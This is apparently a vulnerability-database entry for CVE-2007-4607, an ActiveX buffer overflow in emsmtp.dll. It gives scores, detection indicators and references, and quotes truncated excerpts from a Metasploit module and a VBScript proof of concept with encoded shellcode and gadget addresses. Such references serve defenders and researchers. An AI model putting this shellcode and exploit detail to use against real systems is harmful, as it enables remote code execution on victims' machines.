CVE-2007-4607
Published 2007-08-31
CVE-2007-4607: Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and…
Priority: P3 · 51 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT · EPSS 56.38% (98.9th percentile)
Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and other products, allows remote attackers to execute arbitrary code via a long argument to the SubmitToExpress method, a different vulnerability than CVE-2007-1029. NOTE: this may have been fixed in version 6.0.3.15.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gate_comm_software | postcast_server_pro | — | — |
Detection & IOCs (extracted from sources)
bytes: %eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36
- Detect instantiation of the vulnerable ActiveX control by its ProgID 'EasyMail.SMTP.6' or CLSID '68AC0D5F-0424-11D5-822F-00C04F6BA8D9' in browser/script contexts.
- Alert on calls to the 'SubmitToExpress' method of the EasyMailSMTPObj ActiveX control with an argument length exceeding normal bounds (PoC uses 539+ 'A' characters plus shellcode).
- Detect heap spray targeting address 0x0a0a0a0a with large allocation (0x40000) in JavaScript, a pattern used by the Metasploit module for this CVE.
- Monitor for presence of emsmtp.dll version 6.0.1 loaded in browser processes (iexplore.exe); versions prior to 6.0.3.15 are considered vulnerable.
- The exploit uses a JMP ESP gadget at 0x7E412C78 in user32.dll; detect stack pivots or return-address overwrites pointing to this address on Windows XP/Vista targets.
- The JMP ESP ROP gadget address (0x7E412C78 in user32.dll) is specific to Windows XP SP0-SP3 and Windows Vista with IE 6.0 SP0-SP2 / IE 7; it will differ on other OS/patch levels.
- The vulnerability may have been silently patched in emsmtp.dll version 6.0.3.15; detections targeting the DLL version should account for this boundary.
- The Metasploit module applies JavaScript obfuscation (ObfuscateJS) to variable names and shellcode, so static string-based signatures on variable names will have low reliability.
No detection rules found.
Exploit-DB: Oracle Document Capture 10g - ActiveX Control Buffer Overflow (Metasploit) (exploitdb, 2010-05-09)
---
##
# $Id: oracle_dc_submittoexpress.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle Document Capture 10g ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).
Oracle Document Capture 10g comes bundled with a third party ActiveX control
emsmtp.dll (6.0.1.0). When passing a overly long string to the method "SubmitToExpress"
an attac
Exploit-DB: Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Remote Buffer Overflow (exploitdb, 2007-08-28)
---
'open calc.exe
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%
Metasploit: Oracle Document Capture 10g ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control emsmtp.dll (6.0.1.0). When passing an overly long string to the method "SubmitToExpress" an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/bugtraq/2013-04/0220.html
- http://osvdb.org/38335
- http://retrogod.altervista.org/postcast-emsmtp_bof.html
- http://secunia.com/advisories/24199
- http://secunia.com/advisories/26639
- http://www.kb.cert.org/vuls/id/281977
- http://www.securityfocus.com/bid/25467
- https://community.ivanti.com/docs/DOC-50988
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36307
- https://www.exploit-db.com/exploits/4328